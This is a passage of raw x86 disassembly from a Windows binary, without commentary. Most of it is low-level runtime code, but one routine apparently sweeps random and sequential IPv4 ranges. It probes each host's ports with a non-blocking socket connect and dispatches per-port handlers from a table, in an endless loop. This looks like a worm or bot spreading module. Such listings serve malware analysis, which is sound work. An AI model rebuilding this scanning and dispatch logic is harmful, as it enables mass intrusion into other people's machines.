jmp short loc_41353A
; ---------------------------------------------------------------------------
loc_413534: ; CODE XREF: sub_4134A7+7F�j
or edx, 20000h
loc_41353A: ; CODE XREF: sub_4134A7+83�j
; sub_4134A7+8B�j
test bx, 1000h
jz short loc_413547
or edx, 40000h
loc_413547: ; CODE XREF: sub_4134A7+98�j
mov esi, [esp+20h+arg_4]
mov ecx, [esp+20h+arg_0]
mov eax, esi
not eax
and eax, edx
and ecx, esi
or eax, ecx
cmp eax, edx
mov [esp+20h+var_4], eax
jz loc_41360F
mov ebx, eax
call sub_413379
movzx eax, ax
mov [esp+20h+var_10], eax
fldcw word ptr [esp+20h+var_10]
fstcw word ptr [esp+20h+var_10]
mov ebx, [esp+20h+var_10]
xor edx, edx
test bl, 1
jz short loc_41358A
push 10h
pop edx
loc_41358A: ; CODE XREF: sub_4134A7+DE�j
test bl, 4
jz short loc_413592
or edx, 8
loc_413592: ; CODE XREF: sub_4134A7+E6�j
test bl, 8
jz short loc_41359A
or edx, 4
loc_41359A: ; CODE XREF: sub_4134A7+EE�j
test bl, 10h
jz short loc_4135A2
or edx, 2
loc_4135A2: ; CODE XREF: sub_4134A7+F6�j
test bl, 20h
jz short loc_4135AA
or edx, 1
loc_4135AA: ; CODE XREF: sub_4134A7+FE�j
test bl, 2
jz short loc_4135B5
or edx, 80000h
loc_4135B5: ; CODE XREF: sub_4134A7+106�j
movzx ecx, bx
mov eax, ecx
and eax, edi
jz short loc_4135E2
cmp eax, 400h
jz short loc_4135DC
cmp eax, 800h
jz short loc_4135D4
cmp eax, edi
jnz short loc_4135E2
or edx, ebp
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135D4: ; CODE XREF: sub_4134A7+123�j
or edx, 200h
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135DC: ; CODE XREF: sub_4134A7+11C�j
or edx, 100h
loc_4135E2: ; CODE XREF: sub_4134A7+115�j
; sub_4134A7+127�j ...
and ecx, ebp
jz short loc_4135F6
cmp ecx, 200h
jnz short loc_4135FC
or edx, 10000h
jmp short loc_4135FC
; ---------------------------------------------------------------------------
loc_4135F6: ; CODE XREF: sub_4134A7+13D�j
or edx, 20000h
loc_4135FC: ; CODE XREF: sub_4134A7+145�j
; sub_4134A7+14D�j
test bx, 1000h
jz short loc_413609
or edx, 40000h
loc_413609: ; CODE XREF: sub_4134A7+15A�j
mov eax, edx
mov [esp+20h+var_4], edx
loc_41360F: ; CODE XREF: sub_4134A7+B8�j
cmp dword_433C7C, 0
jz loc_4137A2
and esi, 308031Fh
mov edi, esi
stmxcsr [esp+20h+var_8]
mov eax, [esp+20h+var_8]
xor esi, esi
test al, al
jns short loc_413636
push 10h
pop esi
loc_413636: ; CODE XREF: sub_4134A7+18A�j
test ax, 200h
jz short loc_41363F
or esi, 8
loc_41363F: ; CODE XREF: sub_4134A7+193�j
test ax, 400h
jz short loc_413648
or esi, 4
loc_413648: ; CODE XREF: sub_4134A7+19C�j
test ax, 800h
jz short loc_413651
or esi, 2
loc_413651: ; CODE XREF: sub_4134A7+1A5�j
test ax, 1000h
jz short loc_41365A
or esi, 1
loc_41365A: ; CODE XREF: sub_4134A7+1AE�j
test ax, 100h
jz short loc_413666
or esi, 80000h
loc_413666: ; CODE XREF: sub_4134A7+1B7�j
mov ecx, eax
mov ebp, 6000h
and ecx, ebp
jz short loc_41369B
cmp ecx, 2000h
jz short loc_413695
cmp ecx, 4000h
jz short loc_41368D
cmp ecx, ebp
jnz short loc_41369B
or esi, 300h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_41368D: ; CODE XREF: sub_4134A7+1D8�j
or esi, 200h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_413695: ; CODE XREF: sub_4134A7+1D0�j
or esi, 100h
loc_41369B: ; CODE XREF: sub_4134A7+1C8�j
; sub_4134A7+1DC�j ...
mov ebx, 8040h
and eax, ebx
sub eax, 40h
jz short loc_4136C3
sub eax, 7FC0h
jz short loc_4136BB
sub eax, 40h
jnz short loc_4136C9
or esi, 1000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_4134A7+205�j
or esi, 3000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136C3: ; CODE XREF: sub_4134A7+1FE�j
or esi, 2000000h
loc_4136C9: ; CODE XREF: sub_4134A7+20A�j
; sub_4134A7+212�j ...
mov edx, edi
and edi, [esp+20h+arg_0]
not edx
and edx, esi
or edx, edi
cmp edx, esi
jnz short loc_4136E0
mov eax, esi
jmp loc_41378B
; ---------------------------------------------------------------------------
loc_4136E0: ; CODE XREF: sub_4134A7+230�j
call sub_413407
push eax
mov [esp+24h+arg_4], eax
call sub_4100DA
pop ecx
stmxcsr [esp+20h+arg_4]
mov eax, [esp+20h+arg_4]
xor edx, edx
test al, al
jns short loc_413702
push 10h
pop edx
loc_413702: ; CODE XREF: sub_4134A7+256�j
mov edi, 200h
test eax, edi
jz short loc_41370E
or edx, 8
loc_41370E: ; CODE XREF: sub_4134A7+262�j
test ax, 400h
jz short loc_413717
or edx, 4
loc_413717: ; CODE XREF: sub_4134A7+26B�j
test ax, 800h
jz short loc_413720
or edx, 2
loc_413720: ; CODE XREF: sub_4134A7+274�j
test ax, 1000h
jz short loc_413729
or edx, 1
loc_413729: ; CODE XREF: sub_4134A7+27D�j
mov esi, 100h
test eax, esi
jz short loc_413738
or edx, 80000h
loc_413738: ; CODE XREF: sub_4134A7+289�j
mov ecx, eax
and ecx, ebp
jz short loc_413760
cmp ecx, 2000h
jz short loc_41375E
cmp ecx, 4000h
jz short loc_41375A
cmp ecx, ebp
jnz short loc_413760
or edx, 300h
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375A: ; CODE XREF: sub_4134A7+2A5�j
or edx, edi
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375E: ; CODE XREF: sub_4134A7+29D�j
or edx, esi
loc_413760: ; CODE XREF: sub_4134A7+295�j
; sub_4134A7+2A9�j ...
and eax, ebx
sub eax, 40h
jz short loc_413783
sub eax, 7FC0h
jz short loc_41377B
sub eax, 40h
jnz short loc_413789
or edx, 1000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_41377B: ; CODE XREF: sub_4134A7+2C5�j
or edx, 3000000h
jmp short loc_413789
; ---------------------------------------------------------------------------
loc_413783: ; CODE XREF: sub_4134A7+2BE�j
or edx, 2000000h
loc_413789: ; CODE XREF: sub_4134A7+2CA�j
; sub_4134A7+2D2�j ...
mov eax, edx
loc_41378B: ; CODE XREF: sub_4134A7+234�j
mov ecx, [esp+20h+var_4]
mov edx, eax
xor edx, ecx
or eax, ecx
test edx, 8031Fh
jz short loc_4137A2
or eax, 80000000h
loc_4137A2: ; CODE XREF: sub_4134A7+16F�j
; sub_4134A7+2F4�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_4134A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137AA proc near ; CODE XREF: sub_4123ED+326�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp [ebp+arg_4], esi
push edi
mov [ebp+var_18], 404Eh
mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jbe loc_413920
loc_4137DA: ; CODE XREF: sub_4137AA+146�j
mov edx, [eax]
mov ebx, [eax+4]
mov esi, eax
lea edi, [ebp+var_10]
movsd
movsd
movsd
mov ecx, edx
shr ecx, 1Fh
lea edi, [edx+edx]
lea edx, [ebx+ebx]
or edx, ecx
mov ecx, [eax+8]
mov esi, ebx
shr esi, 1Fh
add ecx, ecx
or ecx, esi
mov [ebp+var_14], edi
mov esi, edi
and [ebp+var_14], 0
mov ebx, edx
shr ebx, 1Fh
add ecx, ecx
shr edi, 1Fh
or ecx, ebx
mov ebx, [ebp+var_10]
add esi, esi
add edx, edx
or edx, edi
lea edi, [esi+ebx]
cmp edi, esi
mov [eax], esi
mov [eax+4], edx
mov [eax+8], ecx
jb short loc_413831
cmp edi, ebx
jnb short loc_413838
loc_413831: ; CODE XREF: sub_4137AA+81�j
mov [ebp+var_14], 1
loc_413838: ; CODE XREF: sub_4137AA+85�j
xor ebx, ebx
cmp [ebp+var_14], ebx
mov [eax], edi
jz short loc_41385B
lea esi, [edx+1]
cmp esi, edx
jb short loc_41384D
cmp esi, 1
jnb short loc_413850
loc_41384D: ; CODE XREF: sub_4137AA+9C�j
xor ebx, ebx
inc ebx
loc_413850: ; CODE XREF: sub_4137AA+A1�j
test ebx, ebx
mov [eax+4], esi
jz short loc_41385B
inc ecx
mov [eax+8], ecx
loc_41385B: ; CODE XREF: sub_4137AA+95�j
; sub_4137AA+AB�j
mov ecx, [eax+4]
mov edx, [ebp+var_C]
lea ebx, [ecx+edx]
xor esi, esi
cmp ebx, ecx
jb short loc_41386E
cmp ebx, edx
jnb short loc_413871
loc_41386E: ; CODE XREF: sub_4137AA+BE�j
xor esi, esi
inc esi
loc_413871: ; CODE XREF: sub_4137AA+C2�j
test esi, esi
mov [eax+4], ebx
jz short loc_41387B
inc dword ptr [eax+8]
loc_41387B: ; CODE XREF: sub_4137AA+CC�j
mov ecx, [ebp+var_8]
add [eax+8], ecx
and [ebp+var_14], 0
lea ecx, [edi+edi]
mov edx, edi
shr edx, 1Fh
lea edi, [ebx+ebx]
or edi, edx
mov edx, [eax+8]
mov esi, ebx
shr esi, 1Fh
lea ebx, [edx+edx]
mov edx, [ebp+arg_0]
or ebx, esi
mov [eax], ecx
mov [eax+4], edi
mov [eax+8], ebx
movsx edx, byte ptr [edx]
lea esi, [ecx+edx]
cmp esi, ecx
mov [ebp+var_10], edx
jb short loc_4138BB
cmp esi, edx
jnb short loc_4138C2
loc_4138BB: ; CODE XREF: sub_4137AA+10B�j
mov [ebp+var_14], 1
loc_4138C2: ; CODE XREF: sub_4137AA+10F�j
cmp [ebp+var_14], 0
mov [eax], esi
jz short loc_4138E6
lea ecx, [edi+1]
xor edx, edx
cmp ecx, edi
jb short loc_4138D8
cmp ecx, 1
jnb short loc_4138DB
loc_4138D8: ; CODE XREF: sub_4137AA+127�j
xor edx, edx
inc edx
loc_4138DB: ; CODE XREF: sub_4137AA+12C�j
test edx, edx
mov [eax+4], ecx
jz short loc_4138E6
inc ebx
mov [eax+8], ebx
loc_4138E6: ; CODE XREF: sub_4137AA+11E�j
; sub_4137AA+136�j
dec [ebp+arg_4]
inc [ebp+arg_0]
cmp [ebp+arg_4], 0
ja loc_4137DA
xor esi, esi
jmp short loc_413920
; ---------------------------------------------------------------------------
loc_4138FA: ; CODE XREF: sub_4137AA+179�j
mov ecx, [eax+4]
mov edx, ecx
shr edx, 10h
mov [eax+8], edx
mov edx, [eax]
mov edi, edx
shl ecx, 10h
shr edi, 10h
or ecx, edi
shl edx, 10h
add [ebp+var_18], 0FFF0h
mov [eax+4], ecx
mov [eax], edx
loc_413920: ; CODE XREF: sub_4137AA+2A�j
; sub_4137AA+14E�j
cmp [eax+8], esi
jz short loc_4138FA
mov ebx, 8000h
test [eax+8], ebx
jnz short loc_41395F
loc_41392F: ; CODE XREF: sub_4137AA+1B3�j
mov esi, [eax]
mov edi, [eax+4]
add [ebp+var_18], 0FFFFh
mov ecx, esi
add esi, esi
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
add ecx, ecx
or ecx, edx
test ecx, ebx
mov [eax+4], esi
mov [eax+8], ecx
jz short loc_41392F
loc_41395F: ; CODE XREF: sub_4137AA+183�j
mov cx, word ptr [ebp+var_18]
mov [eax+0Ah], cx
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4137AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413976 proc near ; CODE XREF: sub_40423C+24�p
; sub_4086EA+10�p ...
jmp ds:dword_41D1B0
sub_413976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41397C proc near ; CODE XREF: sub_413A2D+14B�p
; sub_413A2D+271�p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D27C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4139AD
xor al, al
jmp short loc_413A1F
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_41397C+2B�j
push [ebp+arg_4]
call ds:dword_41D278 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268 ; ioctlsocket
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D240 ; connect
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D258 ; select
push esi
mov edi, eax
call ds:dword_41D224 ; closesocket
test edi, edi
setnle al
loc_413A1F: ; CODE XREF: sub_41397C+2F�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_41397C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_413A2D proc near ; DATA XREF: sub_401F1C+4E3�o
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_130 = byte ptr -130h
var_30 = byte ptr -30h
var_20 = byte ptr -20h
var_1E = byte ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, dword_423064
xor eax, esp
mov [esp+25Ch+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 49h
pop ecx
lea edi, [esp+268h+var_130]
rep movsd
loc_413A59: ; CODE XREF: sub_413A2D+544�j
; sub_413A2D+555�j
lea eax, [esp+268h+var_250]
push eax
lea eax, [esp+26Ch+var_254]
push eax
lea eax, [esp+270h+var_258]
push eax
lea eax, [esp+274h+var_25C]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+278h+var_30]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
mov [esp+280h+var_25C], edi
mov [esp+280h+var_258], edi
mov [esp+280h+var_254], edi
mov [esp+280h+var_250], edi
call sub_4035E4
add esp, 18h
cmp [esp+268h+var_1E], 0
jz short loc_413AE7
cmp [esp+268h+var_25C], edi
mov esi, 0FEh
jnz short loc_413AB7
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_25C], eax
loc_413AB7: ; CODE XREF: sub_413A2D+7B�j
cmp [esp+268h+var_258], edi
jnz short loc_413ACA
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_258], eax
loc_413ACA: ; CODE XREF: sub_413A2D+8E�j
cmp [esp+268h+var_254], edi
jnz short loc_413ADD
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_254], eax
loc_413ADD: ; CODE XREF: sub_413A2D+A1�j
mov eax, [esp+268h+var_250]
cmp eax, edi
jnz short loc_413B39
jmp short loc_413B12
; ---------------------------------------------------------------------------
loc_413AE7: ; CODE XREF: sub_413A2D+70�j
mov eax, [esp+268h+var_18]
sub eax, 0
jz short loc_413B21
dec eax
jz short loc_413B00
dec eax
jnz short loc_413B35
mov eax, 0FEh
jmp short loc_413B14
; ---------------------------------------------------------------------------
loc_413B00: ; CODE XREF: sub_413A2D+C7�j
mov esi, 0FEh
loc_413B05: ; CODE XREF: sub_413A2D+106�j
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_254], eax
loc_413B12: ; CODE XREF: sub_413A2D+B8�j
mov eax, esi
loc_413B14: ; CODE XREF: sub_413A2D+D1�j
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_250], eax
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B21: ; CODE XREF: sub_413A2D+C4�j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_4192C7
mov [esp+268h+var_258], eax
jmp short loc_413B05
; ---------------------------------------------------------------------------
loc_413B35: ; CODE XREF: sub_413A2D+CA�j
mov eax, [esp+268h+var_250]
loc_413B39: ; CODE XREF: sub_413A2D+B6�j
; sub_413A2D+F2�j
shl eax, 8
add eax, [esp+268h+var_254]
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
mov [esp+268h+var_14], eax
mov eax, [esp+268h+var_1C]
cmp eax, edi
jnz loc_413D78
xor ebx, ebx
mov [esp+268h+var_248], ebx
mov eax, offset dword_424548
loc_413B6F: ; CODE XREF: sub_413A2D+169�j
push dword ptr [eax]
push [esp+26Ch+var_14]
call sub_41397C
test al, al
pop ecx
pop ecx
jnz short loc_413B9D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+268h+var_248], ebx
jnz short loc_413B6F
jmp loc_413F62
; ---------------------------------------------------------------------------
loc_413B9D: ; CODE XREF: sub_413A2D+154�j
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS ; "%s"
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_413BD7: ; CODE XREF: sub_413A2D+1AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413BD7
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_140], ebx
imul ebx, 2Ch
mov [esp+268h+var_13C], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_250]
shl esi, 8
add esi, [esp+378h+var_254]
add esp, 110h
shl esi, 8
add esi, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl esi, 8
add esi, [esp+268h+var_25C]
mov [esp+268h+var_244], esi
loc_413C70: ; CODE XREF: sub_413A2D+340�j
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, esi
mov [esp+268h+var_14], eax
jz loc_413D5D
push dword_424548[ebx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413D5D
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_0 ; "%s"
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_413CE7: ; CODE XREF: sub_413A2D+2BF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413CE7
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_248]
mov [esp+268h+var_140], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_244]
add esp, 110h
loc_413D5D: ; CODE XREF: sub_413A2D+264�j
; sub_413A2D+27A�j
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_413C70
jmp loc_413F5D
; ---------------------------------------------------------------------------
loc_413D78: ; CODE XREF: sub_413A2D+131�j
imul eax, 2Ch
push dword_424548[eax]
push [esp+26Ch+var_14]
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F62
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_1 ; "%s"
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+278h+var_240]
add esp, 10h
lea ecx, [eax+1]
loc_413DD1: ; CODE XREF: sub_413A2D+3A9�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413DD1
sub eax, ecx
mov [esp+eax+268h+var_240], dl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[eax]
mov ebx, [esp+378h+var_250]
shl ebx, 8
add ebx, [esp+378h+var_254]
add esp, 110h
shl ebx, 8
add ebx, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl ebx, 8
add ebx, [esp+268h+var_25C]
loc_413E5F: ; CODE XREF: sub_413A2D+52A�j
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, ebx
mov [esp+268h+var_14], eax
jz loc_413F47
mov ecx, [esp+268h+var_1C]
imul ecx, 2Ch
push dword_424548[ecx]
push eax
call sub_41397C
test al, al
pop ecx
pop ecx
jz loc_413F47
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset aS_2 ; "%s"
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402AEE
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_413EE0: ; CODE XREF: sub_413A2D+4B8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EE0
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[eax]
add esp, 110h
loc_413F47: ; CODE XREF: sub_413A2D+453�j
; sub_413A2D+473�j
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_413E5F
loc_413F5D: ; CODE XREF: sub_413A2D+346�j
call sub_4192FB
loc_413F62: ; CODE XREF: sub_413A2D+16B�j
; sub_413A2D+364�j
push 64h
call ds:dword_41D0FC ; Sleep
cmp byte_4269C0, 0
jnz loc_413A59
push 2710h
call ds:dword_41D0FC ; Sleep
jmp loc_413A59
sub_413A2D endp
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0
setnz al
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F8F proc near ; CODE XREF: sub_414023+12�p
; sub_414042+5D�p
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
and dword ptr [ebx+4], 0
mov eax, dword_433C4C
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, offset dword_433C48
push esi
push edi
mov [ebp+var_8], eax
mov [ebp+var_10], eax
loc_413FB0: ; CODE XREF: sub_413F8F+4C�j
mov eax, dword_433C4C
lea edi, [ebp+var_10]
lea esi, [ebp+var_8]
mov [ebp+var_C], eax
call sub_40166F
test al, al
jz short loc_414018
call sub_40164F
mov ecx, [ebx]
cmp ecx, [eax+40h]
lea edi, [ebp+var_18]
jz short loc_413FDD
call sub_40168C
jmp short loc_413FB0
; ---------------------------------------------------------------------------
loc_413FDD: ; CODE XREF: sub_413F8F+45�j
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
lea esi, [ebp+var_10]
mov [ebp+var_C], eax
call sub_40168C
mov eax, [eax+4]
cmp eax, dword_433C4C
jz short loc_414018
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
push eax
mov [ecx+4], edx
call sub_402F6D
dec dword_433C50
pop ecx
loc_414018: ; CODE XREF: sub_413F8F+36�j
; sub_413F8F+6B�j
push ebx
call sub_402F6D
pop ecx
pop edi
pop esi
leave
retn
sub_413F8F endp
; =============== S U B R O U T I N E =======================================
sub_414023 proc near ; CODE XREF: sub_40243A+7C�p
; sub_419477+10B�p
push ebx
mov ebx, eax
push 0
push dword ptr [ebx+4]
call ds:dword_41D094 ; TerminateThread
test eax, eax
jz short loc_41403E
call sub_413F8F
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41403E: ; CODE XREF: sub_414023+10�j
xor al, al
pop ebx
retn
sub_414023 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414042 proc near ; CODE XREF: sub_419EA0+4D2�p
; sub_41B925+240�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
mov eax, dword_433C4C
mov eax, [eax]
push ebx
mov [esp+20h+var_14], eax
mov eax, offset dword_433C48
push esi
push edi
mov [esp+28h+var_18], eax
mov [esp+28h+var_10], eax
loc_414066: ; CODE XREF: sub_414042+54�j
mov eax, dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4140A4
call sub_40164F
mov ecx, [ebp+arg_0]
cmp ecx, [eax+40h]
jz short loc_414098
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_414066
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_414042+49�j
call sub_40164F
mov ebx, [eax]
call sub_413F8F
loc_4140A4: ; CODE XREF: sub_414042+3C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_414042 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140AB proc near ; CODE XREF: sub_40177B+246�p
; sub_4019F3+1F8�p ...
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 54h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push 0
push ecx
push eax
push 0
push 0
call ds:dword_41D110 ; CreateThread
test eax, eax
mov [esi+4], eax
jz short loc_414104
push edi
lea eax, [ebp+var_4B]
push 38h
push eax
call sub_402AEE
mov eax, [esi]
add esp, 0Ch
mov [ebp+var_10], eax
mov eax, dword_433C4C
push eax
mov ecx, offset dword_433C48
push ecx
lea eax, [ebp+var_50]
push eax
mov [ebp+var_4C], 0
mov [ebp+var_50], esi
call sub_4016BA
loc_414104: ; CODE XREF: sub_4140AB+27�j
push 1
push dword ptr [esi+4]
call ds:dword_41D07C ; WaitForSingleObject
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_4140AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41411F proc near ; CODE XREF: sub_41A5C1+1C7�p
; sub_41A5C1+1E1�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 1
push esi
push edi
mov [ebp+var_2], 1
mov [ebp+var_1], 0
jnz loc_414239
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
